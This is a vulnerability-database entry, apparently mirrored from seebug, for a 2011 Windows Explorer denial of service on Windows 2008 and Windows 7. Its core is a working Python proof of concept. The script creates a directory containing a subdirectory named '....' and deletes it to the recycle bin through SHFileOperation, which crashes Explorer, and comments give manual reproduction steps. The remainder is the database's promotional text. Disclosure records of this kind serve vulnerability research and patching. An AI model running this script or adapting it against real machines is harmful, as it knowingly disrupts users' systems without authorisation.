Lucene search
+L

Windows Explorer Denial Of Service (DOS)

🗓️ 25 Dec 2011 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 17 Views

Windows Explorer Denial Of Service (DOS) on Windows 2008 SP2 RC2 and Windows 7 Pro SP

Code

                                                # Windows 2008 SP2 RC2 Explorer Go Byebye :P
# Windows 7 Pro SP1 Explorer Go Byebye :P
# Interesting
# Brought to you by Level & z0r0 @ Smash The Stack
 
from win32com.shell import shell, shellcon
from os import mkdir
 
try:
    mkdir("c:\\trigger_alt")
except:
    print "[!] Trigger Directory Exists"
try:
    mkdir("c:\\trigger_alt\\....")
except:
    print "[!] Trigger Sub Directory Exists"
 
print "[!] Triggering Issue"
 
# This moves the directory containing the sub directory which creates the condition.
# The issue is in the function that moves the files to the recycle bin
# Replicate this using the following
# 1- mkdir c:\trigger_alt
# 2- cd c:\trigger_alt
# 3- mkdir ....\
# 4- My Computer -> c:\trigger_alt
# 5- Right Click -> Delete
 
shell.SHFileOperation((0,shellcon.FO_DELETE,'c:\\trigger_alt',None,shellcon.FOF_ALLOWUNDO|shellcon.FOF_NOCONFIRMATION))
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Dec 2011 00:00Current
7.1High risk
Vulners AI Score7.1
17